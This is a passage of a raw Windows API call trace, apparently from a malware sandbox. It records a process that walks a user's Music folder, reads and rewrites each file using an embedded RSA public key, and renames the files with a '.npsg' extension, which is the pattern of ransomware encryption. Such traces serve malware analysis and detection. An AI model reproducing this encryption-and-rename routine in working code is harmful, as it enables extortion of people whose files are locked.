hHeap=0x620000, dwFlags=0x0, lpMem=0x675190 | out: hHeap=0x620000) returned 1 [0238.072] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0238.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33c2ee8 [0238.072] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0238.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x33c5148 [0238.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373538 [0238.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33adda8 [0238.072] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0238.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34008f0 [0238.073] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0238.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0238.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373598 [0238.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822e0 [0238.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x6822f0 [0238.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8e8 [0238.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f8f8 [0238.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400890 [0238.073] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0238.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373588 [0238.073] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373568 [0238.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f908 [0238.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f918 [0238.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3b7f928 [0238.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34008a8 [0238.073] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f918 | out: hHeap=0x620000) returned 1 [0238.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c87c0 [0238.073] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f908 | out: hHeap=0x620000) returned 1 [0238.073] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400878 [0238.073] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f928 | out: hHeap=0x620000) returned 1 [0238.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400908 [0238.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373568 [0238.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8e8 | out: hHeap=0x620000) returned 1 [0238.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34008d8 [0238.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373568 | out: hHeap=0x620000) returned 1 [0238.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34008c0 [0238.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400920 [0238.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34008c0 | out: hHeap=0x620000) returned 1 [0238.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34008c0 [0238.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34008d8 | out: hHeap=0x620000) returned 1 [0238.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373598 [0238.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373538 | out: hHeap=0x620000) returned 1 [0238.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c8800 [0238.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373598 | out: hHeap=0x620000) returned 1 [0238.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x33fd4c8 [0238.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400890 | out: hHeap=0x620000) returned 1 [0238.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x3400890 [0238.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373588 | out: hHeap=0x620000) returned 1 [0238.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x3b90810 [0238.074] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34008f0 | out: hHeap=0x620000) returned 1 [0238.074] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b948 [0238.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400920 | out: hHeap=0x620000) returned 1 [0238.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x3b94b10 [0238.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0238.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x3b7bb78 [0238.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822e0 | out: hHeap=0x620000) returned 1 [0238.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x3b7b830 [0238.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400890 | out: hHeap=0x620000) returned 1 [0238.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x346fa10 [0238.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b948 | out: hHeap=0x620000) returned 1 [0238.075] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x64dd08 [0238.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0238.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a770 | out: hHeap=0x620000) returned 1 [0238.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c2ee8 | out: hHeap=0x620000) returned 1 [0238.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64dd08 | out: hHeap=0x620000) returned 1 [0238.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8800 | out: hHeap=0x620000) returned 1 [0238.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7b830 | out: hHeap=0x620000) returned 1 [0238.075] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b94b10 | out: hHeap=0x620000) returned 1 [0238.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0238.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7bb78 | out: hHeap=0x620000) returned 1 [0238.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6822f0 | out: hHeap=0x620000) returned 1 [0238.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34008c0 | out: hHeap=0x620000) returned 1 [0238.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7f8f8 | out: hHeap=0x620000) returned 1 [0238.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400908 | out: hHeap=0x620000) returned 1 [0238.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87c0 | out: hHeap=0x620000) returned 1 [0238.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34008a8 | out: hHeap=0x620000) returned 1 [0238.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400878 | out: hHeap=0x620000) returned 1 [0238.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x340dd38 | out: hHeap=0x620000) returned 1 [0238.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c19c8 | out: hHeap=0x620000) returned 1 [0238.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6affc0 | out: hHeap=0x620000) returned 1 [0238.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400860 | out: hHeap=0x620000) returned 1 [0238.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3409908 | out: hHeap=0x620000) returned 1 [0238.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0238.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33adda8 | out: hHeap=0x620000) returned 1 [0238.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c5148 | out: hHeap=0x620000) returned 1 [0238.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0238.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c87a0 | out: hHeap=0x620000) returned 1 [0238.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0238.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0238.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0238.076] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7aa18 | out: hHeap=0x620000) returned 1 [0238.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0238.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0238.077] WriteFile (in: hFile=0x644, lpBuffer=0x3b83cd0*, nNumberOfBytesToWrite=0x9185, lpNumberOfBytesWritten=0x39afb14, lpOverlapped=0x0 | out: lpBuffer=0x3b83cd0*, lpNumberOfBytesWritten=0x39afb14*=0x9185, lpOverlapped=0x0) returned 1 [0238.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0238.077] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x918a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.077] WriteFile (in: hFile=0x644, lpBuffer=0x33b8188*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x33b8188*, lpNumberOfBytesWritten=0x39afb50*=0x100, lpOverlapped=0x0) returned 1 [0238.077] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33b8188 | out: hHeap=0x620000) returned 1 [0238.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.077] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x346fa10 [0238.077] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", cchWideChar=-1, lpMultiByteStr=0x346fa10, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1", lpUsedDefaultChar=0x0) returned 41 [0238.078] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x3b83cd0 [0238.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0238.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.078] WriteFile (in: hFile=0x644, lpBuffer=0x3b83cd0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x3b83cd0*, lpNumberOfBytesWritten=0x39afb50*=0x28, lpOverlapped=0x0) returned 1 [0238.078] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0238.078] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0238.078] WriteFile (in: hFile=0x644, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x39afb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x39afb50*=0x26, lpOverlapped=0x0) returned 1 [0238.078] CloseHandle (hObject=0x644) returned 1 [0238.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e728 [0238.080] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8a0) returned 0x3b83cd0 [0238.080] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e728 | out: hHeap=0x620000) returned 1 [0238.080] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\DjK6Z9TVms11M9cA8w.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\djk6z9tvms11m9ca8w.m4a"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\DjK6Z9TVms11M9cA8w.m4a.npsg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\djk6z9tvms11m9ca8w.m4a.npsg")) returned 1 [0238.081] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b83cd0 | out: hHeap=0x620000) returned 1 [0238.081] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.081] VirtualFree (lpAddress=0x39f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0238.082] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64e690 | out: hHeap=0x620000) returned 1 [0238.082] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb5f825f0, ftCreationTime.dwHighDateTime=0x1d5bfcc, ftLastAccessTime.dwLowDateTime=0x4ea014d0, ftLastAccessTime.dwHighDateTime=0x1d5c4e0, ftLastWriteTime.dwLowDateTime=0x4ea014d0, ftLastWriteTime.dwHighDateTime=0x1d5c4e0, nFileSizeHigh=0x0, nFileSizeLow=0x125d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="fHTJAvELPoS-vEpQO.wav", cAlternateFileName="FHTJAV~1.WAV")) returned 1 [0238.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x3b7ca38 [0238.082] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64e690 [0238.083] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ca38 | out: hHeap=0x620000) returned 1 [0238.083] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\fHTJAvELPoS-vEpQO.wav") returned=".wav" [0238.083] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ZmlmXoAngk\\fHTJAvELPoS-vEpQO.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\zmlmxoangk\\fhtjavelpos-vepqo.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0238.083] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=4701) returned 1 [0238.083] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39f0000 [0238.086] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x1237, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0238.086] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0238.088] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0238.089] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.089] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0238.089] ReadFile (in: hFile=0x644, lpBuffer=0x39f0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39f0000*, lpNumberOfBytesRead=0x39afb70*=0x125d, lpOverlapped=0x0) returned 1 [0238.089] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.089] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1da) returned 0x3b7a830 [0238.090] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.090] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA3Ao+95Co8iXj7vZj+Fdn\\\\njhtdw5h8CSe6eYnpnRQAXs5Aii7k\\/XrqShUZyjIbJnn0bzsnAXOhpvlydDmHUYmY\\\\nvG\\/uCiHhq8woSPM6cpVLtK1uGAzozxN4Tv5HjHIQejze6yft7hHJdMFZ0iO1dPit\\\\nGTv7xjj6yM3nglgAo78wCqR7aKJQYnzC6l9WnRboHsaGPXBoA2u61V1lSw6YoN3K\\\\nkf2gsJPPugAqdnyV8zP302E8Lh2xGWFqOyyRAvVXVOqpYhkyM0lMeV\\/xBtWKhcgx\\\\nfXxBd4W2dDZujCMhp+sScLyU3hg8GGyCtLzUx30Fe6VhB6hzalZa6H7rufuEkGCe\\\\ntQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0238.090] CryptAcquireContextW (in: phProv=0x39afa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39afa50*=0x67a770) returned 1 [0238.091] CryptCreateHash (in: hProv=0x67a770, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39afa58 | out: phHash=0x39afa58) returned 1 [0238.091] CryptHashData (hHash=0x33f0408, pbData=0x3b7a830, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0238.091] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39afa54) returned 1 [0238.091] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x33c87a0 [0238.091] CryptGetHashParam (in: hHash=0x33f0408, dwParam=0x2, pbData=0x33c87a0, pdwDataLen=0x39afa54, dwFlags=0x0 | out: pbData=0x33c87a0, pdwDataLen=0x39afa54) returned 1 [0238.091] GetLastError () returned 0x0 [0238.091] CryptDestroyHash (hHash=0x33f0408) returned 1 [0238.091] CryptReleaseContext (hProv=0x67a770, dwFlags=0x0) returned 1 [0238.091] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7a830 | out: hHeap=0x620000) returned 1 [0238.091] UuidCreate (in: Uuid=0x39afa48 | out: Uuid=0x39afa48) returned 0x0 [0238.091] UuidToStringA (in: Uuid=0x39afa48, StringUuid=0x39afa40 | out: StringUuid=0x39afa40) returned 0x0 [0238.091] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.091] RpcStringFreeA (in: String=0x39afa40 | out: String=0x39afa40) returned 0x0 [0238.091] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0238.091] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0238.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1260) returned 0x3b83cd0 [0238.092] SetFilePointer (in: hFile=0x644, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0238.092] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1920 | out: hHeap=0x620000) returned 1 [0238.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7a830 [0238.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1920 [0238.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1e0) returned 0x3b7aa18 [0238.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecb68 [0238.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3409908 [0238.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400860 [0238.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3409950 [0238.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400878 [0238.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34008a8 [0238.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400908 [0238.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x34008c0 [0238.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x33f8198 [0238.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x3b7fce8 [0238.092] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x3b7fce8, Size=0x218) returned 0x3b90810 [0238.092] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x346fa10 [0238.092] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34008a8 | out: hHeap=0x620000) returned 1 [0238.093] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34008c0 | out: hHeap=0x620000) returned 1 [0238.093] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400908 | out: hHeap=0x620000) returned 1 [0238.093] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33f8198 | out: hHeap=0x620000) returned 1 [0238.093] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x346fa10 | out: hHeap=0x620000) returned 1 [0238.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x3400908 [0238.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373548 [0238.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x34008c0 [0238.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x33c8780 [0238.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x34008a8 [0238.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x3373528 [0238.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x3b7ba60 [0238.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0238.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x33ecc28 [0238.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87a0 [0238.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x3b7bb78 [0238.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x33c87c0 [0238.093] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x3373588 [0238.093] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b7ba60 | out: hHeap=0x620000) returned 1 [0238.093] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34008c0 | out: hHeap=0x620000) returned 1 [0238.093] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373528 | out: hHeap=0x620000) returned 1 [0238.093] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x34008a8 | out: hHeap=0x620000) returned 1 [0238.093] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c8780 | out: hHeap=0x620000) returned 1 [0238.093] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3373548 | out: hHeap=0x620000) returned 1 [0238.094] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3400908 | out: hHeap=0x620000) returned 1 [0238.094] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0238.094] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33ecb68 | out: hHeap=0x620000) returned 1 [0238.094] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b90810 | out: hHeap=0x620000) returned 1 [0238.094] GetCurrentThreadId () returned 0x5b4 [0238.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x33b8188 [0238.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x3b83248 [0238.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x33c19c8 [0238.094] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a770 [0238.094] 